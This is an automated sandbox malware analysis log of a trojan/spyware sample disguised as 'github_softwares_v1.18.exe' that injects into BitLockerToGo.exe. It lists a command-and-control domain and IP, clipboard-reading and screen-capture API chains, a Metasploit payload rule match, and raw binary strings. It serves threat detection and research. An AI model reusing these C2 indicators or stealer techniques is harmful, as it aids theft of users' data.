              Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: github_softwares_v1.18.exeString found in binary or memory: https://gorm.io/docs/hooks.htmlWarning:
              Source: BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: BitLockerToGo.exe, 00000001.00000003.1730889198.0000000004FFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: BitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: BitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: BitLockerToGo.exe, 00000001.00000003.1730995668.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1730889198.0000000004FFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: BitLockerToGo.exe, 00000001.00000003.1730995668.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: BitLockerToGo.exe, 00000001.00000003.1730995668.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1730889198.0000000004FFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: BitLockerToGo.exe, 00000001.00000003.1730995668.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: BitLockerToGo.exe, 00000001.00000003.1743040571.0000000002EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weaknessmznxo.shop/
              Source: BitLockerToGo.exe, 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1777480522.0000000002E8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weaknessmznxo.shop/((
              Source: BitLockerToGo.exe, 00000001.00000002.1846072628.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1844557480.0000000002E89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weaknessmznxo.shop/22
              Source: BitLockerToGo.exe, 00000001.00000003.1754529360.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1754816151.0000000002F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weaknessmznxo.shop/GHd
              Source: BitLockerToGo.exe, 00000001.00000002.1846072628.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1844557480.0000000002E89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weaknessmznxo.shop/H
              Source: BitLockerToGo.exe, 00000001.00000003.1730674997.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1743040571.0000000002EF5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.1846585558.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1800001882.0000000002EE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weaknessmznxo.shop/api
              Source: BitLockerToGo.exe, 00000001.00000003.1716565174.0000000002EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weaknessmznxo.shop/api-L
              Source: BitLockerToGo.exe, 00000001.00000003.1743040571.0000000002EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weaknessmznxo.shop/api0fB?
              Source: BitLockerToGo.exe, 00000001.00000003.1754529360.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1772726652.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weaknessmznxo.shop/apiBU
              Source: BitLockerToGo.exe, 00000001.00000002.1846072628.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1844557480.0000000002E89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weaknessmznxo.shop/h
              Source: BitLockerToGo.exe, 00000001.00000003.1830856779.0000000002EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weaknessmznxo.shop:443/api
              Source: BitLockerToGo.exe, 00000001.00000003.1730573797.0000000002E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://weaknessmznxo.shop:443/api6
              Source: BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: BitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: BitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: BitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: BitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: BitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownHTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A2F370 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_02A2F370
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A2F370 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_02A2F370
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A2F570 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,1_2_02A2F570

              System Summary

              barindex
              Source: 00000000.00000002.1708564024.000000C0006DC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A0B2601_2_02A0B260
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A343401_2_02A34340
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A238401_2_02A23840
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A181841_2_02A18184
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A279701_2_02A27970
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A29EF21_2_02A29EF2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A04E701_2_02A04E70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A16E501_2_02A16E50
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A22C101_2_02A22C10
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A3A59A1_2_02A3A59A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A1154C1_2_02A1154C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A3CAB01_2_02A3CAB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A232B51_2_02A232B5
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A01A081_2_02A01A08
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A1F3211_2_02A1F321
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A083301_2_02A08330
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A3B3001_2_02A3B300
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A240B71_2_02A240B7
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A3B0901_2_02A3B090
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A1E80E1_2_02A1E80E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A010511_2_02A01051
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A141881_2_02A14188
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A039901_2_02A03990
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A3B1D01_2_02A3B1D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A059201_2_02A05920
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A0F1101_2_02A0F110
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A066B01_2_02A066B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A01EB01_2_02A01EB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A3AE801_2_02A3AE80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A3B6301_2_02A3B630
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A2461E1_2_02A2461E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A246431_2_02A24643
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A14F7A1_2_02A14F7A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A06CA01_2_02A06CA0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A044801_2_02A04480
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A2143B1_2_02A2143B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A0BD801_2_02A0BD80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A275E01_2_02A275E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A3CDD01_2_02A3CDD0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A3AD001_2_02A3AD00
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A015661_2_02A01566
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 02A09600 appears 164 times
              Source: github_softwares_v1.18.exeStatic PE information: Number of sections : 12 > 10
              Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000580000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs github_softwares_v1.18.exe
              Source: github_softwares_v1.18.exe, 00000000.00000002.1708247125.000000C000400000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs github_softwares_v1.18.exe
              Source: github_softwares_v1.18.exe, 00000000.00000003.1701551736.0000014A798F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs github_softwares_v1.18.exe
              Source: github_softwares_v1.18.exe, 00000000.00000003.1701601425.0000014A798B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs github_softwares_v1.18.exe
              Source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C0006A1000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs github_softwares_v1.18.exe
              Source: 00000000.00000002.1708564024.000000C0006DC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: github_softwares_v1.18.exeBinary string: bindm in unexpected GOOSrunqsteal: runq overflowdouble traceGCSweepStartbad use of trace.seqlockx509: malformed validityexec: Stdout already setexec: Stderr already setjson: unsupported type: invalid ticket length %dsql: statement is closedMon Jan _2 15:04:05 2006result must be a pointertext/html; charset=utf-8zlib: invalid dictionaryinvalid pattern syntax: address string too shortresource length too longunpacking Question.Classunexpected mantissa baseunexpected exponent baseRat.Scan: invalid syntaxindent can only be space%s%s is unsupported typeunknown address protocolinvalid address checksumcould not decode: %v: %wsha2-256-trunc254-paddedunmarshaling t.Owner: %wRemoveExpiredAllocations302231454903657293676544ConfirmSectorProofsValidunmarshaling t.Quota: %wVerifyDealsForActivationunmarshaling t.Label: %wunmarshaling t.Value: %wunmarshaling t.Actor: %wSubmitPoRepForBulkVerifyunmarshaling t.Miner: %wChangeMultiaddrsExportedExtendClaimTermsExportedhttp2: canceling requestunexpected buffer len=%vinvalid pseudo-header %qinvalid request :path %qapplication/octet-streamRequest Entity Too Largehttp: nil Request.HeaderstreamSafe was not resetValue kind is %s, not %s_html_template_urlfilteron range loop re-entry: at range loop continue: application/x-ecmascriptapplication/x-javascript(\$)(\{?([A-Z0-9_]+)\}?)ErrorHandler should exitduplicate %TAG directiveread handler must be setexceeded max depth of %dwhile scanning an anchorerror decrypting messagecertificate unobtainableTLS_RSA_WITH_RC4_128_SHAexpected float; found %s%s (and %d other errors)tabwriter: panic during \Device\NamedPipe\cygwinNotNestedGreaterGreater;token used before issuedtoken has invalid issuertoken has invalid claimsunbounded valkey message%s
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@2/1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A2B2EB CoCreateInstance,1_2_02A2B2EB
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeFile created: C:\Users\Public\Libraries\mhgkj.scifJump to behavior
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeFile opened: C:\Windows\system32\65ebcc9f5b8418f2c8843172241992038cf06349e5b1f11b7c097dd1e98b7546AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
              Source: github_softwares_v1.18.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\github_softwares_v1.18.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: github_softwares_v1.18.exeString found in binary or memory: depgithub.com/filecoin-project/go-addressv1.1.0h1:ofdtUtEsNxkIxkDw67ecSmvtzaVSdcea4boAmLbnHfE=
              Source: github_softwares_v1.18.exeString found in binary or memory: depgithub.com/hashicorp/hc-installv0.7.1-0.20240607080111-03e0bd63529fh1:vRnx/KymAhdkO7+m1JgBWnf4B4C3Ex9AYXg3jOlll+8=
              Source: github_softwares_v1.18.exeString found in binary or memory: depgithub.com/ipfs/go-ipfs-ds-helpv1.1.0h1:yLE2w9RAsl31LtfMt91tRZcrx+e61O5mDxFRR994w4Q=
              Source: github_softwares_v1.18.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
              Source: github_softwares_v1.18.exeString found in binary or memory: &github.com/filecoin-project/go-address
              Source: github_softwares_v1.18.exeString found in binary or memory: asn1:"tag:0,optional"&*func(*x509.CertPool, time.Time) error&*map.bucket[context.canceler]struct {}&github.com/filecoin-project/go-address&*map.bucket[cid.Cid]*builtin.actorInfo
              Source: github_softwares_v1.18.exeString found in binary or memory: invalid escape code %q in stringgoogle/protobuf/descriptor.protoexceeded maximum recursion depthweak message %v is not linked in%v already implements proto.Enumfield %v has invalid nil pointercould not parse value for %v: %qcrypto/aes: output not full blockreflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length CryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPointWInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWImage base beyond allowed addressThunk AddressOfData beyond limitsCentral Kurdish Iraq (ku-Arab-IQ)Norwegian (Bokmal) Norway (nb-NO)could not find signer certificateinvalid VS_VERSION_INFO block. %s(\\)?(\$)(\()?\{?([A-Z0-9_]+)?\}?too many levels of symbolic links142108547152020037174224853515625710542735760100185871124267578125GODEBUG: no value specified for "bytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whenceslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangesync: RUnlock of unlocked RWMutexcrypto: requested hash function #go package net: confVal.netCgo = skip everything and stop the walkwaiting for unsupported file typeencoding: missing byte order markx509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagesx509: no DEK-Info header in blockindefinite length found (not DER)struct contains unexported fieldssql: connection is already closedapplication/x-www-form-urlencodedtoo many Answers to pack (>65535)Float.GobDecode: buffer too smallSigEd25519 no Ed25519 collisions
              Source: github_softwares_v1.18.exeString found in binary or memory: invalid escape code %q in stringgoogle/protobuf/descriptor.protoexceeded maximum recursion depthweak message %v is not linked in%v already implements proto.Enumfield %v has invalid nil pointercould not parse value for %v: %qcrypto/aes: output not full blockreflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length CryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPointWInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWImage base beyond allowed addressThunk AddressOfData beyond limitsCentral Kurdish Iraq (ku-Arab-IQ)Norwegian (Bokmal) Norway (nb-NO)could not find signer certificateinvalid VS_VERSION_INFO block. %s(\\)?(\$)(\()?\{?([A-Z0-9_]+)?\}?too many levels of symbolic links142108547152020037174224853515625710542735760100185871124267578125GODEBUG: no value specified for "bytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whenceslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangesync: RUnlock of unlocked RWMutexcrypto: requested hash function #go package net: confVal.netCgo = skip everything and stop the walkwaiting for unsupported file typeencoding: missing byte order markx509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagesx509: no DEK-Info header in blockindefinite length found (not DER)struct contains unexported fieldssql: connection is already closedapplication/x-www-form-urlencodedtoo many Answers to pack (>65535)Float.GobDecode: buffer too smallSigEd25519 no Ed25519 collisions
              Source: github_softwares_v1.18.exeString found in binary or memory: google.protobuf.FieldOptions_JSTypegoogle.protobuf.FileDescriptorProtogoogle.protobuf.EnumDescriptorProtogoogle.protobuf.UninterpretedOption&descriptor.ServiceDescriptorProto{delimiters may only be "{}" or "<>"string field contains invalid UTF-8%v already implements proto.Messagecrypto/cipher: input not full blocksmethod ABI and value ABI don't alignreflect.Value.Equal: values of type Time.UnmarshalBinary: invalid lengthstrings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point supportCherokee United States (chr-Cher-US)Chinese (Traditional) Taiwan (zh-TW)English United Arab Emirates (en-AE)accessing a corrupted shared library444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzbytes: Repeat output length overflowbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionsyntax error scanning complex numberlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
              Source: github_softwares_v1.18.exeString found in binary or memory: google.protobuf.FieldOptions_JSTypegoogle.protobuf.FileDescriptorProtogoogle.protobuf.EnumDescriptorProtogoogle.protobuf.UninterpretedOption&descriptor.ServiceDescriptorProto{delimiters may only be "{}" or "<>"string field contains invalid UTF-8%v already implements proto.Messagecrypto/cipher: input not full blocksmethod ABI and value ABI don't alignreflect.Value.Equal: values of type Time.UnmarshalBinary: invalid lengthstrings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point supportCherokee United States (chr-Cher-US)Chinese (Traditional) Taiwan (zh-TW)English United Arab Emirates (en-AE)accessing a corrupted shared library444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzbytes: Repeat output length overflowbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionsyntax error scanning complex numberlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
              Source: github_softwares_v1.18.exeString found in binary or memory: github.com/filecoin-project/go-address.init
